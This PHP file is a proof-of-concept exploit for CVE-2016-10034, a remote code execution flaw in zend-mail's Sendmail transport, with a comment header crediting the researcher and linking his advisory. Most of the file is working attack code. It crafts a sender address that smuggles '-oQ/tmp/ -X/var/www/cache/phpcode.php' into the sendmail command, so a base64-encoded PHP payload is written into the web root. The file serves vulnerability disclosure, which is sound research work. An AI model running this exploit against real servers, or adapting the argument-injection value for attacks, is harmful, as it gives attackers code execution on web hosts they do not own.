<?php
/*
Zend Framework <2.4.11Remote Code Execution (CVE-2016-10034)
zend-mail <2.4.11
zend-mail <2.7.2
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no.0==[/usr/sbin/sendmail]
Arg no.1==[-t]
Arg no.2==[-i]
Arg no.3==[-r]
Arg no.4==[attacker\]
Arg no.5==[-oQ/tmp/]
Arg no.6==[-X/var/www/cache/phpcode.php]
Arg no.7==["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:09607<<< Content-Type: text/html; charset=us-ascii09607<<<09607<<<<?php phpinfo(); ?>09607<<<09607<<<09607<<<
See the full advisory URL for the exploit details.*/// Attacker's input coming from untrusted source such as $_GET , $_POST etc.// For example from a Contact form with sender field
$email_from ='"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");//------------------// mail() param injection via the vulnerability in zend-mail
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
Zend\Loader\AutoloaderFactory::factory(array('Zend\Loader\StandardAutoloader'=> array('autoregister_zf'=> true
)));
Zend\Mvc\Application::init(require 'config/application.php')->run();
$message= new \Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from,'Attacker');
$message->addTo('support@localhost','Support');
$message->setSubject('Zend PoC');
$transport= new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
